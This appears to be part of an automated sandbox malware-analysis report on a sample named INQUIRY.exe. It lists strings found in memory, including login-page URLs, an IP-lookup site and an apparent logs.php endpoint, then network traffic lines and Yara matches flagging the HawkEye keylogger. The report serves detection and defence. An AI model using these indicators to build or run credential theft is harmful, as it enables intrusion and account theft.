                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designershq
                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerslb
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
